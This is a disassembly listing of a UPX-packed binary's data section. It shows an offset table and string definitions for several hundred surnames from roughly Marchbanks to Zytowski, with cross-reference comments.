offset aMarchbanks ; "Marchbanks" dd offset aMarcus ; "Marcus" dd offset aMargalit ; "Margalit" dd offset aMargetts ; "Margetts" dd offset aMarques ; "Marques" dd offset aMartinez ; "Martinez" dd offset aMartochio ; "Martochio" dd offset aMarton ; "Marton" dd offset aMarubini ; "Marubini" dd offset aMass ; "Mass" dd offset aMatalka ; "Matalka" dd offset aMatarazzo ; "Matarazzo" dd offset aMatsukata ; "Matsukata" dd offset aMattson ; "Mattson" dd offset aMauzy ; "Mauzy" dd offset aMay ; "May" dd offset aMazzali ; "Mazzali" dd offset aMazziotta ; "Mazziotta" dd offset aMcbride ; "Mcbride" dd offset aMccaffery ; "Mccaffery" dd offset aMccall ; "Mccall" dd offset aMcclearn ; "Mcclearn" dd offset aMcdowell ; "Mcdowell" dd offset aMcelroy ; "Mcelroy" dd offset aMcfadden ; "McFadden" dd offset aMcghee ; "Mcghee" dd offset aMcgoldrick ; "Mcgoldrick" dd offset aMcilroy ; "McIlroy" dd offset aMcintosh ; "Mcintosh" dd offset aMckenna ; "Mckenna" dd offset aMclane ; "Mclane" dd offset aMclaren ; "Mclaren" dd offset aMcnealy ; "Mcnealy" dd offset aMcnulty ; "Mcnulty" dd offset aMeccariello ; "Meccariello" dd offset aMemisoglu ; "Memisoglu" dd offset aMenzies ; "Menzies" dd offset aMerikoski ; "Merikoski" dd offset aMerlani ; "Merlani" dd offset aMerminod ; "Merminod" dd offset aMerseth ; "Merseth" dd offset aMerz ; "Merz" dd offset aMetelka ; "Metelka" dd offset aMetropolis ; "Metropolis" dd offset aMeurer ; "Meurer" dd offset aMichelman ; "Michelman" dd offset aMiddle ; "Middle" dd offset aMieher ; "Mieher" dd offset aMills ; "Mills" dd offset aMinh ; "Minh" dd offset aMini ; "Mini" dd offset aMinichiello ; "Minichiello" dd offset aGonzalez ; "Gonzalez" dd offset aMitropoulos ; "Mitropoulos" dd offset aMittal ; "Mittal" dd offset aMocroft ; "Mocroft" dd offset aModestino ; "Modestino" dd offset aMoeller ; "Moeller" dd offset aMohr ; "Mohr" dd offset aMoiamedi ; "Moiamedi" dd offset aMonque ; "Monque" dd offset aMontilio ; "Montilio" dd offset aMooredech_ ; "MooreDeCh." dd offset aMorani ; "Morani" dd offset aMoreton ; "Moreton" dd offset aMorrison ; "Morrison" dd offset aMorrow ; "Morrow" dd offset aMortimer ; "Mortimer" dd offset aMosher ; "Mosher" dd offset aMosler ; "Mosler" dd offset aMostafavi ; "Mostafavi" dd offset aMotooka ; "Motooka" dd offset aMudarri ; "Mudarri" dd offset aMuello ; "Muello" dd offset aMugnai ; "Mugnai" dd offset aMulkern ; "Mulkern" dd offset aMulroy ; "Mulroy" dd offset aMumford ; "Mumford" dd offset aMussachio ; "Mussachio" dd offset aNaddeo ; "Naddeo" dd offset aNapolitano ; "Napolitano" dd offset aNardi ; "Nardi" dd offset aNardone ; "Nardone" dd offset aNaviaux ; "Naviaux" dd offset aNayduch ; "Nayduch" dd offset aNelson ; "Nelson" dd offset aNenna ; "Nenna" dd offset aNesci ; "Nesci" dd offset aNeuman ; "Neuman" dd offset aNewfeld ; "Newfeld" dd offset aNewlin ; "Newlin" dd offset aNg ; "Ng" dd offset aNi_0 ; "Ni" dd offset aNickerson ; "Nickerson" dd offset aNickoloff ; "Nickoloff" dd offset aNisenson ; "Nisenson" dd offset aNitabach ; "Nitabach" dd offset aNotman ; "Notman" dd offset aNuzum ; "Nuzum" dd offset aOcougne ; "Ocougne" dd offset aOgata ; "Ogata" dd offset aOh ; "Oh" dd offset aOHagan ; "O'hagan" dd offset aOldford ; "Oldford" dd offset aOlsen ; "Olsen" dd offset aOlson ; "Olson" dd offset aOlszewski ; "Olszewski" dd offset aOMalley ; "O'malley" dd offset aOman ; "Oman" dd offset aOMeara ; "O'meara" dd offset aOpel ; "Opel" dd offset aOray ; "Oray" dd offset aOrfield ; "Orfield" dd offset aOrsi ; "Orsi" dd offset aOspina ; "Ospina" dd offset aOstrowski ; "Ostrowski" dd offset aOttaviani ; "Ottaviani" dd offset aOtten ; "Otten" dd offset aOuchida ; "Ouchida" dd offset aOvid ; "Ovid" dd offset aPaesdealmeida ; "PaesDealmeida" dd offset aPaine ; "Paine" dd offset aPalayoor ; "Palayoor" dd offset aPalepu ; "Palepu" dd offset aPallara ; "Pallara" dd offset aPalmitesta ; "Palmitesta" dd offset aPanadero ; "Panadero" dd offset aPanizzon ; "Panizzon" dd offset aPantilla ; "Pantilla" dd offset aPaoletti ; "Paoletti" dd offset aParmeggiani ; "Parmeggiani" dd offset aParris ; "Parris" dd offset aPartridge ; "Partridge" dd offset aPascucci ; "Pascucci" dd offset aPatefield ; "Patefield" dd offset aPatrick ; "Patrick" dd offset aPattullo ; "Pattullo" dd offset aPavetti ; "Pavetti" dd offset aPavlon ; "Pavlon" dd offset aPawloski ; "Pawloski" dd offset aPaynter ; "Paynter" dd offset aPeabody ; "Peabody" dd offset aPearlberg ; "Pearlberg" dd offset aPederson ; "Pederson" dd offset aPeishel ; "Peishel" dd offset aPenny ; "Penny" dd offset aPereira ; "Pereira" dd offset aPerko ; "Perko" dd offset aPerlak ; "Perlak" dd offset aPerlman ; "Perlman" dd offset aPerna ; "Perna" dd offset aPerone ; "Perone" dd offset aPerrimon ; "Perrimon" dd offset aPeters ; "Peters" dd offset aPetruzello ; "Petruzello" dd offset aPettibone ; "Pettibone" dd offset aPettit ; "Pettit" dd offset aPfister ; "Pfister" dd offset aPilbeam ; "Pilbeam" dd offset aPinot ; "Pinot" dd offset aPlancon ; "Plancon" dd offset aPlant ; "Plant" dd offset aPlasket ; "Plasket" dd offset aPlous ; "Plous" dd offset aPo ; "Po" dd offset aPocobene ; "Pocobene" dd offset aPoincaire ; "Poincaire" dd offset aPointer ; "Pointer" dd offset aPoirier ; "Poirier" dd offset aPolak ; "Polak" dd offset aPolanyi ; "Polanyi" dd offset aPolitis ; "Politis" dd offset aPoma ; "Poma" dd offset aPoolman ; "Poolman" dd offset aPowers ; "Powers" dd offset aPresper ; "Presper" dd offset aPreucel ; "Preucel" dd offset aPrevost ; "Prevost" dd offset aPritchard ; "Pritchard" dd offset aPritz ; "Pritz" dd offset aProietti ; "Proietti" dd offset aProthrowStith ; "Prothrow-Stith" dd offset aPuccia ; "Puccia" dd offset aPugh ; "Pugh" dd offset aPynchon ; "Pynchon" dd offset aQuaday ; "Quaday" dd offset aQuetin ; "Quetin" dd offset aRabe ; "Rabe" dd offset aRabkin ; "Rabkin" dd offset aRadeke ; "Radeke" dd offset aRajagopalan ; "Rajagopalan" dd offset aRaney ; "Raney" dd offset aRangan ; "Rangan" dd offset aRankin ; "Rankin" dd offset aRapple ; "Rapple" dd offset aRayport ; "Rayport" dd offset aReddenTyler ; "Redden-Tyler" dd offset aReedquist ; "Reedquist" dd offset aCunningham ; "Cunningham" dd offset aReinold ; "Reinold" dd offset aRemak ; "Remak" dd offset aRenick ; "Renick" dd offset aRepetto ; "Repetto" dd offset aResnik ; "Resnik" dd offset aRhea ; "Rhea" dd offset aRichmond ; "Richmond" dd offset aRielly ; "Rielly" dd offset aRindos ; "Rindos" dd offset aRineer ; "Rineer" dd offset aRish ; "Rish" dd offset aRivera ; "Rivera" dd offset aRobinson ; "Robinson" dd offset aRocha ; "Rocha" dd offset aRoesler ; "Roesler" dd offset aRogers ; "Rogers" dd offset aRonen ; "Ronen" dd offset aRow ; "Row" dd offset aRoyal ; "Royal" dd offset aRu ; "Ru" dd offset aRuan ; "Ruan" dd offset aRuderman ; "Ruderman" dd offset aRuescher ; "Ruescher" dd offset aRush ; "Rush" dd offset aRyu ; "Ryu" dd offset aSabatello ; "Sabatello" dd offset aSadler ; "Sadler" dd offset aSafire ; "Safire" dd offset aSahu ; "Sahu" dd offset aSali ; "Sali" dd offset aSamson ; "Samson" dd offset aSanchezRamirez ; "Sanchez-Ramirez" dd offset aSanna ; "Sanna" dd offset aSapers ; "Sapers" dd offset aSarin ; "Sarin" dd offset aSartore ; "Sartore" dd offset aSase ; "Sase" dd offset aSatin ; "Satin" dd offset aSatta ; "Satta" dd offset aSatterthwaite ; "Satterthwaite" dd offset aSawtell ; "Sawtell" dd offset aSayied ; "Sayied" dd offset aScarponi ; "Scarponi" dd offset aScepan ; "Scepan" dd offset aScharf ; "Scharf" dd offset aScharlemann ; "Scharlemann" dd offset aScheiner ; "Scheiner" dd offset aSchiano ; "Schiano" dd offset aSchifini ; "Schifini" dd offset aSchilling ; "Schilling" dd offset aSchmitt ; "Schmitt" dd offset aSchossberger ; "Schossberger" dd offset aSchuman ; "Schuman" dd offset aSchutte ; "Schutte" dd offset aSchuyler ; "Schuyler" dd offset aSchwan ; "Schwan" dd offset aSchwickrath ; "Schwickrath" dd offset aScovel ; "Scovel" dd offset aScudder ; "Scudder" dd offset aSeaton ; "Seaton" dd offset aSeeber ; "Seeber" dd offset aSegal ; "Segal" dd offset aSekler ; "Sekler" dd offset aSelvage ; "Selvage" dd offset aSen ; "Sen" dd offset aSennett ; "Sennett" dd offset aSeterdahl ; "Seterdahl" dd offset aSexton ; "Sexton" dd offset aSeyfert ; "Seyfert" dd offset aShaikh ; "Shaikh" dd offset aShakis ; "Shakis" dd offset aShankland ; "Shankland" dd offset aShanley ; "Shanley" dd offset aShar ; "Shar" dd offset aShatrov ; "Shatrov" dd offset aShavelson ; "Shavelson" dd offset aShea ; "Shea" dd offset aSheats ; "Sheats" dd offset aShepherd ; "Shepherd" dd offset aSheppard ; "Sheppard" dd offset aShepstone ; "Shepstone" dd offset aShesko ; "Shesko" dd offset aShia ; "Shia" dd offset aShibata ; "Shibata" dd offset aShimon ; "Shimon" dd offset aSiesto ; "Siesto" dd offset aSigalot ; "Sigalot" dd offset aSigini ; "Sigini" dd offset aSigna ; "Signa" dd offset aSilverman ; "Silverman" dd offset aSilvetti ; "Silvetti" dd offset aSinsabaugh ; "Sinsabaugh" dd offset aSirilli ; "Sirilli" dd offset aSites ; "Sites" dd offset aSkane ; "Skane" dd offset aSkerry ; "Skerry" dd offset aSkoda ; "Skoda" dd offset aSloan ; "Sloan" dd offset aSlowe ; "Slowe" dd offset aSmilow ; "Smilow" dd offset aSniffen ; "Sniffen" dd offset aSnodgrass ; "Snodgrass" dd offset aSocolow ; "Socolow" dd offset aSolon ; "Solon" dd offset aSomers ; "Somers" dd offset aSommariva ; "Sommariva" dd offset aSorabella ; "Sorabella" dd offset aSorg ; "Sorg" dd offset aSottak ; "Sottak" dd offset aSoukup ; "Soukup" dd offset aSoule ; "Soule" dd offset aSoultanian ; "Soultanian" dd offset aSpanier ; "Spanier" dd offset aSparrow ; "Sparrow" dd offset aSpaulding ; "Spaulding" dd offset aSpeizer ; "Speizer" dd offset aSpence ; "Spence" dd offset aSperber ; "Sperber" dd offset aSpicer ; "Spicer" dd offset aSpiegelhalter ; "Spiegelhalter" dd offset aSpiliotis ; "Spiliotis" dd offset aSpinrad ; "Spinrad" dd offset aStmartin ; "StMartin" dd offset aStalvey ; "Stalvey" dd offset aStam ; "Stam" dd offset aStang ; "Stang" dd offset aStassinopolus ; "Stassinopolus" dd offset aStates ; "States" dd offset aStatlender ; "Statlender" dd offset aStefani ; "Stefani" dd offset aSteiner ; "Steiner" dd offset aStephanian ; "Stephanian" dd offset aStepniewska ; "Stepniewska" dd offset aStewartOaten ; "Stewart-Oaten" dd offset aStiepock ; "Stiepock" dd offset aStillwell ; "Stillwell" dd offset aStock ; "Stock" dd offset aStockton ; "Stockton" dd offset aStockwell ; "Stockwell" dd offset aStolzenberg ; "Stolzenberg" dd offset aStonich ; "Stonich" dd offset aStorer ; "Storer" dd offset aStott ; "Stott" dd offset aStrange ; "Strange" dd offset aStrauch ; "Strauch" dd offset aStreiff ; "Streiff" dd offset aStringer ; "Stringer" dd offset aSullivan ; "Sullivan" dd offset aSumner ; "Sumner" dd offset aSuo ; "Suo" dd offset aSurdam ; "Surdam" dd offset aSweeting ; "Sweeting" dd offset aSweetser ; "Sweetser" dd offset aSwindle ; "Swindle" dd offset aTagiuri ; "Tagiuri" dd offset aTai ; "Tai" dd offset aTalaugon ; "Talaugon" dd offset aTambiah ; "Tambiah" dd offset aTandler ; "Tandler" dd offset aTanowitz ; "Tanowitz" dd offset aTatar ; "Tatar" dd offset aTaveras ; "Taveras" dd offset aTawn ; "Tawn" dd offset aTcherepnin ; "Tcherepnin" dd offset aTeague ; "Teague" dd offset aTemes ; "Temes" dd offset aTemmer ; "Temmer" dd offset aTenney ; "Tenney" dd offset aTerracini ; "Terracini" dd offset aThan ; "Than" dd offset aThavaneswaran ; "Thavaneswaran" dd offset aTheodos ; "Theodos" dd offset aThibault ; "Thibault" dd offset aThisted ; "Thisted" dd offset aThomsen ; "Thomsen" dd offset aThroop ; "Throop" dd offset aTierney ; "Tierney" dd offset aTill ; "Till" dd offset aTimmons ; "Timmons" dd offset aTofallis ; "Tofallis" dd offset aTollestrup ; "Tollestrup" dd offset aTolls ; "Tolls" dd offset aTolman ; "Tolman" dd offset aTomford ; "Tomford" dd offset aToomer ; "Toomer" dd offset aTopulos ; "Topulos" dd offset aTorresi ; "Torresi" dd offset aTorske ; "Torske" dd offset aTowler ; "Towler" dd offset aToye ; "Toye" dd offset aTraebert ; "Traebert" dd offset aTrenga ; "Trenga" dd offset aTrewin ; "Trewin" dd offset aTringali ; "Tringali" dd offset aTroiani ; "Troiani" dd offset aTroy ; "Troy" dd offset aTruss ; "Truss" dd offset aTsiatis ; "Tsiatis" dd offset aTsomides ; "Tsomides" dd offset aTsukurov ; "Tsukurov" dd offset aTuck ; "Tuck" dd offset aTudge ; "Tudge" dd offset aTukan ; "Tukan" dd offset aTurano ; "Turano" dd offset aTurek ; "Turek" dd offset aTuttle ; "Tuttle" dd offset aTwells ; "Twells" dd offset aTzamarias ; "Tzamarias" dd offset aUllman ; "Ullman" dd offset aUntermeyer ; "Untermeyer" dd offset aUpsdell ; "Upsdell" dd offset aUrban ; "Urban" dd offset aUrdangBrown ; "Urdang-Brown" dd offset aUsdan ; "Usdan" dd offset aUzuner ; "Uzuner" dd offset aVacca ; "Vacca" dd offset aWaite ; "Waite" dd offset aValberg ; "Valberg" dd offset aValencia ; "Valencia" dd offset aWales ; "Wales" dd offset aWallenberg ; "Wallenberg" dd offset aWalter ; "Walter" dd offset aVanallen ; "vanAllen" dd offset aVanzwet ; "VanZwet" dd offset aVandenberg ; "Vandenberg" dd offset aVanheeckeren ; "Vanheeckeren" dd offset aWarshafsky ; "Warshafsky" dd offset aWasowska ; "Wasowska" dd offset aVasquez ; "Vasquez" dd offset aWaugh ; "Waugh" dd offset aWeighart ; "Weighart" dd offset aWeingarten ; "Weingarten" dd offset aWeinhaus ; "Weinhaus" dd offset aWeissbourd ; "Weissbourd" dd offset aWeissman ; "Weissman" dd offset aVelasquez ; "Velasquez" dd offset aWelles ; "Welles" dd offset aWelsh ; "Welsh" dd offset aWengret ; "Wengret" dd offset aVenne ; "Venne" dd offset aVerghese ; "Verghese" dd offset aWescott ; "Wescott" dd offset aWetzel ; "Wetzel" dd offset aWhately ; "Whately" dd offset aWhilton ; "Whilton" dd offset aWhite ; "White" dd offset aWhitla ; "Whitla" dd offset aWhittaker ; "Whittaker" dd offset aViana ; "Viana" dd offset aViano ; "Viano" dd offset aWiedersheim ; "Wiedersheim" dd offset aWiener ; "Wiener" dd offset aViens ; "Viens" dd offset aVignola ; "Vignola" dd offset aWilder ; "Wilder" dd offset aWilhelm ; "Wilhelm" dd offset aWilk ; "Wilk" dd offset aWilkin ; "Wilkin" dd offset aWilkinson ; "Wilkinson" dd offset aVillarreal ; "Villarreal" dd offset aWillstatter ; "Willstatter" dd offset aWilson ; "Wilson" dd offset aVitali ; "Vitali" dd offset aViviani ; "Viviani" dd offset aVoigt ; "Voigt" dd offset aWolk ; "Wolk" dd offset aVonhoffman ; "VonHoffman" dd offset aWoo ; "Woo" dd offset aWooden ; "Wooden" dd offset aWoods ; "Woods" dd offset aWoodsPowell ; "Woods-Powell" dd offset aVorhaus ; "Vorhaus" dd offset aVotey ; "Votey" dd offset aYacono ; "Yacono" dd offset aYamane ; "Yamane" dd offset aYankee ; "Yankee" dd offset aYarchuk ; "Yarchuk" dd offset aYates ; "Yates" dd offset aYbarra ; "Ybarra" dd offset aYedidia ; "Yedidia" dd offset aYesson ; "Yesson" dd offset aYetiv ; "Yetiv" dd offset aYoffe ; "Yoffe" dd offset aYoo ; "Yoo" dd offset aYoukSee ; "Youk-See" dd offset aYu ; "Yu" dd offset aZachary ; "Zachary" dd offset aZahedi ; "Zahedi" dd offset aZangwill ; "Zangwill" dd offset aZegans ; "Zegans" dd offset aZerbini ; "Zerbini" dd offset aZoldak ; "Zoldak" dd offset aZucconi ; "Zucconi" dd offset aZurn ; "Zurn" dd offset aZwiers ; "Zwiers" dd offset aZytowski ; "Zytowski" aZytowski db 'Zytowski',0 ; DATA XREF: UPX0:0042EF28o align 4 aZwiers db 'Zwiers',0 ; DATA XREF: UPX0:0042EF24o align 10h aZurn db 'Zurn',0 ; DATA XREF: UPX0:0042EF20o align 4 aZucconi db 'Zucconi',0 ; DATA XREF: UPX0:0042EF1Co aZoldak db 'Zoldak',0 ; DATA XREF: UPX0:0042EF18o align 4 aZerbini db 'Zerbini',0 ; DATA XREF: UPX0:0042EF14o aZegans db 'Zegans',0 ; DATA XREF: UPX0:0042EF10o align 4 aZangwill db 'Zangwill',0 ; DATA XREF: UPX0:0042EF0Co align 4 aZahedi db 'Zahedi',0 ; DATA XREF: UPX0:0042EF08o align 4 aZachary db 'Zachary',0 ; DATA XREF: UPX0:0042EF04o aYu db 'Yu',0 ; DATA XREF: UPX0:0042EF00o align 4 aYoukSee db 'Youk-See',0 ; DATA XREF: UPX0:0042EEFCo align 4 aYoo db 'Yoo',0 ; DATA XREF: UPX0:0042EEF8o aYoffe db 'Yoffe',0 ; DATA XREF: UPX0:0042EEF4o align 10h aYetiv db 'Yetiv',0 ; DATA XREF: UPX0:0042EEF0o align 4 aYesson db 'Yesson',0 ; DATA XREF: UPX0:0042EEECo align 10h aYedidia db 'Yedidia',0 ; DATA XREF: UPX0:0042EEE8o aYbarra db 'Ybarra',0 ; DATA XREF: UPX0:0042EEE4o align 10h aYates db 'Yates',0 ; DATA XREF: UPX0:0042EEE0o align 4 aYarchuk db 'Yarchuk',0 ; DATA XREF: UPX0:0042EEDCo aYankee db 'Yankee',0 ; DATA XREF: UPX0:0042EED8o align 4 aYamane db 'Yamane',0 ; DATA XREF: UPX0:0042EED4o align 10h aYacono db 'Yacono',0 ; DATA XREF: UPX0:0042EED0o align 4 aVotey db 'Votey',0 ; DATA XREF: UPX0:0042EECCo align 10h aVorhaus db 'Vorhaus',0 ; DATA XREF: UPX0:0042EEC8o aWoodsPowell db 'Woods-Powell',0 ; DATA XREF: UPX0:0042EEC4o align 4 aWoods db 'Woods',0 ; DATA XREF: UPX0:0042EEC0o align 10h aWooden db 'Wooden',0 ; DATA XREF: UPX0:0042EEBCo align 4 aWoo db 'Woo',0 ; DATA XREF: UPX0:0042EEB8o aVonhoffman db 'VonHoffman',0 ; DATA XREF: UPX0:0042EEB4o align 4 aWolk db 'Wolk',0 ; DATA XREF: UPX0:0042EEB0o align 10h aVoigt db 'Voigt',0 ; DATA XREF: UPX0:0042EEACo align 4 aViviani db 'Viviani',0 ; DATA XREF: UPX0:0042EEA8o aVitali db 'Vitali',0 ; DATA XREF: UPX0:0042EEA4o align 4 aWilson db 'Wilson',0 ; DATA XREF: UPX0:0042EEA0o align 10h aWillstatter db 'Willstatter',0 ; DATA XREF: UPX0:0042EE9Co aVillarreal db 'Villarreal',0 ; DATA XREF: UPX0:0042EE98o align 4 aWilkinson db 'Wilkinson',0 ; DATA XREF: UPX0:0042EE94o align 4 aWilkin db 'Wilkin',0 ; DATA XREF: UPX0:0042EE90o align 4 aWilk db 'Wilk',0 ; DATA XREF: UPX0:0042EE8Co align 4 aWilhelm db 'Wilhelm',0 ; DATA XREF: UPX0:0042EE88o aWilder db 'Wilder',0 ; DATA XREF: UPX0:0042EE84o align 4 aVignola db 'Vignola',0 ; DATA XREF: UPX0:0042EE80o aViens db 'Viens',0 ; DATA XREF: UPX0:0042EE7Co align 4 aWiener db 'Wiener',0 ; DATA XREF: UPX0:0042EE78o align 4 aWiedersheim db 'Wiedersheim',0 ; DATA XREF: UPX0:0042EE74o aViano db 'Viano',0 ; DATA XREF: UPX0:0042EE70o align 10h aViana db 'Viana',0 ; DATA XREF: UPX0:0042EE6Co align 4 aWhittaker db 'Whittaker',0 ; DATA XREF: UPX0:0042EE68o align 4 aWhitla db 'Whitla',0 ; DATA XREF: UPX0:0042EE64o align 4 aWhite db 'White',0 ; DATA XREF: UPX0:0042EE60o align 4 aWhilton db 'Whilton',0 ; DATA XREF: UPX0:0042EE5Co aWhately db 'Whately',0 ; DATA XREF: UPX0:0042EE58o aWetzel db 'Wetzel',0 ; DATA XREF: UPX0:0042EE54o align 4 aWescott db 'Wescott',0 ; DATA XREF: UPX0:0042EE50o aVerghese db 'Verghese',0 ; DATA XREF: UPX0:0042EE4Co align 10h aVenne db 'Venne',0 ; DATA XREF: UPX0:0042EE48o align 4 aWengret db 'Wengret',0 ; DATA XREF: UPX0:0042EE44o aWelsh db 'Welsh',0 ; DATA XREF: UPX0:0042EE40o align 4 aWelles db 'Welles',0 ; DATA XREF: UPX0:0042EE3Co align 10h aVelasquez db 'Velasquez',0 ; DATA XREF: UPX0:0042EE38o align 4 aWeissman db 'Weissman',0 ; DATA XREF: UPX0:0042EE34o align 4 aWeissbourd db 'Weissbourd',0 ; DATA XREF: UPX0:0042EE30o align 4 aWeinhaus db 'Weinhaus',0 ; DATA XREF: UPX0:0042EE2Co align 10h aWeingarten db 'Weingarten',0 ; DATA XREF: UPX0:0042EE28o align 4 aWeighart db 'Weighart',0 ; DATA XREF: UPX0:0042EE24o align 4 aWaugh db 'Waugh',0 ; DATA XREF: UPX0:0042EE20o align 10h aVasquez db 'Vasquez',0 ; DATA XREF: UPX0:0042EE1Co aWasowska db 'Wasowska',0 ; DATA XREF: UPX0:0042EE18o align 4 aWarshafsky db 'Warshafsky',0 ; DATA XREF: UPX0:0042EE14o align 10h aVanheeckeren db 'Vanheeckeren',0 ; DATA XREF: UPX0:0042EE10o align 10h aVandenberg db 'Vandenberg',0 ; DATA XREF: UPX0:0042EE0Co align 4 aVanzwet db 'VanZwet',0 ; DATA XREF: UPX0:0042EE08o aVanallen db 'vanAllen',0 ; DATA XREF: UPX0:0042EE04o align 10h aWalter db 'Walter',0 ; DATA XREF: UPX0:0042EE00o align 4 aWallenberg db 'Wallenberg',0 ; DATA XREF: UPX0:0042EDFCo align 4 aWales db 'Wales',0 ; DATA XREF: UPX0:0042EDF8o align 4 aValencia db 'Valencia',0 ; DATA XREF: UPX0:0042EDF4o align 4 aValberg db 'Valberg',0 ; DATA XREF: UPX0:0042EDF0o aWaite db 'Waite',0 ; DATA XREF: UPX0:0042EDECo align 4 aVacca db 'Vacca',0 ; DATA XREF: UPX0:0042EDE8o align 10h aUzuner db 'Uzuner',0 ; DATA XREF: UPX0:0042EDE4o align 4 aUsdan db 'Usdan',0 ; DATA XREF: UPX0:0042EDE0o align 10h aUrdangBrown db 'Urdang-Brown',0 ; DATA XREF: UPX0:0042EDDCo align 10h aUrban db 'Urban',0 ; DATA XREF: UPX0:0042EDD8o align 4 aUpsdell db 'Upsdell',0 ; DATA XREF: UPX0:0042EDD4o aUntermeyer db 'Untermeyer',0 ; DATA XREF: UPX0:0042EDD0o align 4 aUllman db 'Ullman',0 ; DATA XREF: UPX0:0042EDCCo align 4 aTzamarias db 'Tzamarias',0 ; DATA XREF: UPX0:0042EDC8o align 10h aTwells db 'Twells',0 ; DATA XREF: UPX0:0042EDC4o align 4 aTuttle db 'Tuttle',0 ; DATA XREF: UPX0:0042EDC0o align 10h aTurek db 'Turek',0 ; DATA XREF: UPX0:0042EDBCo align 4 aTurano db 'Turano',0 ; DATA XREF: UPX0:0042EDB8o align 10h aTukan db 'Tukan',0 ; DATA XREF: UPX0:0042EDB4o align 4 aTudge db 'Tudge',0 ; DATA XREF: UPX0:0042EDB0o align 10h aTuck db 'Tuck',0 ; DATA XREF: UPX0:0042EDACo align 4 aTsukurov db 'Tsukurov',0 ; DATA XREF: UPX0:0042EDA8o align 4 aTsomides db 'Tsomides',0 ; DATA XREF: UPX0:0042EDA4o align 10h aTsiatis db 'Tsiatis',0 ; DATA XREF: UPX0:0042EDA0o aTruss db 'Truss',0 ; DATA XREF: UPX0:0042ED9Co align 10h aTroy db 'Troy',0 ; DATA XREF: UPX0:0042ED98o align 4 aTroiani db 'Troiani',0 ; DATA XREF: UPX0:0042ED94o aTringali db 'Tringali',0 ; DATA XREF: UPX0:0042ED90o align 4 aTrewin db 'Trewin',0 ; DATA XREF: UPX0:0042ED8Co align 4 aTrenga db 'Trenga',0 ; DATA XREF: UPX0:0042ED88o align 4 aTraebert db 'Traebert',0 ; DATA XREF: UPX0:0042ED84o align 4 aToye db 'Toye',0 ; DATA XREF: UPX0:0042ED80o align 10h aTowler db 'Towler',0 ; DATA XREF: UPX0:0042ED7Co align 4 aTorske db 'Torske',0 ; DATA XREF: UPX0:0042ED78o align 10h aTorresi db 'Torresi',0 ; DATA XREF: UPX0:0042ED74o aTopulos db 'Topulos',0 ; DATA XREF: UPX0:0042ED70o aToomer db 'Toomer',0 ; DATA XREF: UPX0:0042ED6Co align 4 aTomford db 'Tomford',0 ; DATA XREF: UPX0:0042ED68o aTolman db 'Tolman',0 ; DATA XREF: UPX0:0042ED64o align 4 aTolls db 'Tolls',0 ; DATA XREF: UPX0:0042ED60o align 10h aTollestrup db 'Tollestrup',0 ; DATA XREF: UPX0:0042ED5Co align 4 aTofallis db 'Tofallis',0 ; DATA XREF: UPX0:0042ED58o align 4 aTimmons db 'Timmons',0 ; DATA XREF: UPX0:0042ED54o aTill db 'Till',0 ; DATA XREF: UPX0:0042ED50o align 4 aTierney db 'Tierney',0 ; DATA XREF: UPX0:0042ED4Co aThroop db 'Throop',0 ; DATA XREF: UPX0:0042ED48o align 4 aThomsen db 'Thomsen',0 ; DATA XREF: UPX0:0042ED44o aThisted db 'Thisted',0 ; DATA XREF: UPX0:0042ED40o aThibault db 'Thibault',0 ; DATA XREF: UPX0:0042ED3Co align 4 aTheodos db 'Theodos',0 ; DATA XREF: UPX0:0042ED38o aThavaneswaran db 'Thavaneswaran',0 ; DATA XREF: UPX0:0042ED34o align 4 aThan db 'Than',0 ; DATA XREF: UPX0:0042ED30o align 4 aTerracini db 'Terracini',0 ; DATA XREF: UPX0:0042ED2Co align 10h aTenney db 'Tenney',0 ; DATA XREF: UPX0:0042ED28o align 4 aTemmer db 'Temmer',0 ; DATA XREF: UPX0:0042ED24o align 10h aTemes db 'Temes',0 ; DATA XREF: UPX0:0042ED20o align 4 aTeague db 'Teague',0 ; DATA XREF: UPX0:0042ED1Co align 10h aTcherepnin db 'Tcherepnin',0 ; DATA XREF: UPX0:0042ED18o align 4 aTawn db 'Tawn',0 ; DATA XREF: UPX0:0042ED14o align 4 aTaveras db 'Taveras',0 ; DATA XREF: UPX0:0042ED10o aTatar db 'Tatar',0 ; DATA XREF: UPX0:0042ED0Co align 4 aTanowitz db 'Tanowitz',0 ; DATA XREF: UPX0:0042ED08o align 10h aTandler db 'Tandler',0 ; DATA XREF: UPX0:0042ED04o aTambiah db 'Tambiah',0 ; DATA XREF: UPX0:0042ED00o aTalaugon db 'Talaugon',0 ; DATA XREF: UPX0:0042ECFCo align 4 aTai db 'Tai',0 ; DATA XREF: UPX0:0042ECF8o aTagiuri db 'Tagiuri',0 ; DATA XREF: UPX0:0042ECF4o aSwindle db 'Swindle',0 ; DATA XREF: UPX0:0042ECF0o aSweetser db 'Sweetser',0 ; DATA XREF: UPX0:0042ECECo align 4 aSweeting db 'Sweeting',0 ; DATA XREF: UPX0:0042ECE8o align 4 aSurdam db 'Surdam',0 ; DATA XREF: UPX0:0042ECE4o align 10h aSuo db 'Suo',0 ; DATA XREF: UPX0:0042ECE0o aSumner db 'Sumner',0 ; DATA XREF: UPX0:0042ECDCo align 4 aSullivan db 'Sullivan',0 ; DATA XREF: UPX0:0042ECD8o align 4 aStringer db 'Stringer',0 ; DATA XREF: UPX0:0042ECD4o align 4 aStreiff db 'Streiff',0 ; DATA XREF: UPX0:0042ECD0o aStrauch db 'Strauch',0 ; DATA XREF: UPX0:0042ECCCo aStrange db 'Strange',0 ; DATA XREF: UPX0:0042ECC8o aStott db 'Stott',0 ; DATA XREF: UPX0:0042ECC4o align 4 aStorer db 'Storer',0 ; DATA XREF: UPX0:0042ECC0o align 4 aStonich db 'Stonich',0 ; DATA XREF: UPX0:0042ECBCo aStolzenberg db 'Stolzenberg',0 ; DATA XREF: UPX0:0042ECB8o aStockwell db 'Stockwell',0 ; DATA XREF: UPX0:0042ECB4o align 4 aStockton db 'Stockton',0 ; DATA XREF: UPX0:0042ECB0o align 4 aStock db 'Stock',0 ; DATA XREF: UPX0:0042ECACo align 10h aStillwell db 'Stillwell',0 ; DATA XREF: UPX0:0042ECA8o align 4 aStiepock db 'Stiepock',0 ; DATA XREF: UPX0:0042ECA4o align 4 aStewartOaten db 'Stewart-Oaten',0 ; DATA XREF: UPX0:0042ECA0o align 4 aStepniewska db 'Stepniewska',0 ; DATA XREF: UPX0:0042EC9Co aStephanian db 'Stephanian',0 ; DATA XREF: UPX0:0042EC98o align 10h aSteiner db 'Steiner',0 ; DATA XREF: UPX0:0042EC94o aStefani db 'Stefani',0 ; DATA XREF: UPX0:0042EC90o aStatlender db 'Statlender',0 ; DATA XREF: UPX0:0042EC8Co align 4 aStates db 'States',0 ; DATA XREF: UPX0:0042EC88o 